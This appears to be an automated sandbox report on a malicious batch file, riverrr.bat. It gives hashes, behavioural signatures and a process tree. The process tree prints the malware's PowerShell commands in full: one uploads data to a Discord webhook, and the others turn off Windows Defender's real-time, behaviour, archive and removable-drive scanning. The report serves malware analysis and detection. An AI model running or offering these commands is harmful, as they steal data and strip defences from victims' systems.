Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
145s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
19/09/2023, 03:08
Static task
static1
Behavioral task
behavioral1
Sample
riverrr.bat
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
riverrr.bat
Resource
win10v2004-20230915-en
General
-
Target
riverrr.bat
-
Size
5KB
-
MD5
fc498e2bdba1e606ec3a8279694de87a
-
SHA1
005a4e7517f8760b92bf92255224c3a51a9d5cf6
-
SHA256
93e8750b3a7c51c0f588908f39d89e1e51650c475c9376ed3f71e7c9945ed00a
-
SHA512
8b3dc61a95224129da7df6240cde12aa4dcf20fc0e37d277f1d92d152f537a751ee11eb4d8281335cb3eb728b4810d38c73914435167cd8e8f29d8e0139401be
-
SSDEEP
96:OyPPks5E5hngSMz6p5dvxiaXa05CACvEMRu5CECvElCw2+c:tPPQrp5dvkaXa05CACvEMI5CECvEMw4
Malware Config
Extracted
https://discord.com/api/webhooks/1152857858543718450/qR3bD0V-wMFzOw9cnKsF3KjME7YhDRXOkZep_Oy4ztLtCIN3pK5i3wdOMzSNp6Ry3Xvv
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 8 1196 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 1196 powershell.exe 1196 powershell.exe 2032 powershell.exe 2032 powershell.exe 4800 powershell.exe 4800 powershell.exe 4864 powershell.exe 4864 powershell.exe 5056 powershell.exe 5056 powershell.exe 1524 powershell.exe 1524 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 1196 powershell.exe Token: SeDebugPrivilege 2032 powershell.exe Token: SeDebugPrivilege 4800 powershell.exe Token: SeDebugPrivilege 4864 powershell.exe Token: SeDebugPrivilege 5056 powershell.exe Token: SeDebugPrivilege 1524 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1896 wrote to memory of 1196 1896 cmd.exe 85 PID 1896 wrote to memory of 1196 1896 cmd.exe 85 PID 1896 wrote to memory of 2032 1896 cmd.exe 87 PID 1896 wrote to memory of 2032 1896 cmd.exe 87 PID 1896 wrote to memory of 4800 1896 cmd.exe 88 PID 1896 wrote to memory of 4800 1896 cmd.exe 88 PID 1896 wrote to memory of 4864 1896 cmd.exe 90 PID 1896 wrote to memory of 4864 1896 cmd.exe 90 PID 1896 wrote to memory of 5056 1896 cmd.exe 92 PID 1896 wrote to memory of 5056 1896 cmd.exe 92 PID 1896 wrote to memory of 1524 1896 cmd.exe 94 PID 1896 wrote to memory of 1524 1896 cmd.exe 94
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\riverrr.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -c "$client = New-Object System.Net.WebClient;$client.UploadString('https://discord.com/api/webhooks/1152857858543718450/qR3bD0V-wMFzOw9cnKsF3KjME7YhDRXOkZep_Oy4ztLtCIN3pK5i3wdOMzSNp6Ry3Xvv',(New-Object System.Text.ASCIIEncoding).GetString([System.Convert]::FromBase64String('JABzAD0AcwB0AGEAbgBzAC4AbgBlAHQALgBXAGUAYgBvAGQAZQBjAHQAIAB8ACAAWwBTAHQAYQBuAHMAaABWAGUAZQBtAGUAbgB0AC4ARwBlAGQAdAAuAE4AZQB0AFMAbwBmAHQAXQAuAEcAZQB0AEYAaQBsAGUAUwB0AGEAbgBzAHQAaQB0ACgAJABDAG8AbQBwAHIAZQBzAHMAKQA=')))"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1196
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "Set-MpPreference -DisableRealtimeMonitoring $true"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "Set-MpPreference -DisableIOAVProtection $true"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4800
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "Set-MpPreference -DisableArchiveScanning $true"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "Set-MpPreference -DisableBehaviorMonitoring $true"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "Set-MpPreference -DisableRemovableDriveScanning $true"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1524
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD549e7d5f2a296b59afec08bc314bed998
SHA17f898bf195ffd46ce2d19fad0ce33155f6e47f5f
SHA256394832dfefa5e2e6204b60708a2ca33bb9d2f529664419bc050975f4b80faefe
SHA512f64579fdac0bfebad4c20ad575b8ea45136e295fba950da4cbf84402228a3897b2e2deb4eb4605deb5df93321b1dc15c8a878da36016d7e5e060182142fdf839
-
Filesize
1KB
MD564ec213a8ef039617920b2f2eb1e37d7
SHA1b2e11596266ab56ba953c896cf9d868864ee2aa8
SHA2565a629b3588081039c213d5407fe1b52e16c380af6539f69cab0262acd5886491
SHA512c524e0c776bf4473ce69688d620d3beb43d14b92c77f98f8737ead9e5d2af6ed34c0073dac15545daf666bbde3ca06675533509aac8f84a547e97a5f13921553
-
Filesize
944B
MD58c9337215dd1003e764138fb79e1cede
SHA1ad9beead781140ddee69fd99627e5658060b707f
SHA25669a4ddee22fb149d89baadad38568b3420b9c8acc5976520ce5bb8982b80ff89
SHA512fc8d90b49a49525ca87942caba468dddf1ac5a3d4423e7749263a0f81616e560db35af6cafb87beed6ab10ef029490329ab76d8ba4245a9f4b8942190503b508
-
Filesize
944B
MD56d14ccefeb263594e60b1765e131f7a3
SHA14a9ebdc0dff58645406c40b7b140e1b174756721
SHA25657cd435c8b2bf10a2c77698301789c032e1b6b623ff1420c72e8bca0b10f1e5c
SHA5122013a26123f72a4106524fd9d7389ac4654f97033d22707efc084fb2a3ad01c298eb64f01bb64861ab603615022dbe7cfc97475346edb16b3ba72e905127f101
-
Filesize
944B
MD5e60eb305a7b2d9907488068b7065abd3
SHA11643dd7f915ac50c75bc01c53d68c5dafb9ce28d
SHA256ad07460e061642c0dd4e7dfa7b821aacce873e290389e72f708e9f3504f9d135
SHA51295c45afec6fa4e0b2a21edd10a6b2dc30568810c67bc9bc34d98ab111c48261f377a370583adb27e08616b0108026c119493b1b093b52ce931117e646b46cb7b
-
Filesize
944B
MD55cfe303e798d1cc6c1dab341e7265c15
SHA1cd2834e05191a24e28a100f3f8114d5a7708dc7c
SHA256c4d16552769ca1762f6867bce85589c645ac3dc490b650083d74f853f898cfab
SHA512ef151bbe0033a2caf2d40aff74855a3f42c8171e05a11c8ce93c7039d9430482c43fe93d9164ee94839aff253cad774dbf619dde9a8af38773ca66d59ac3400e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82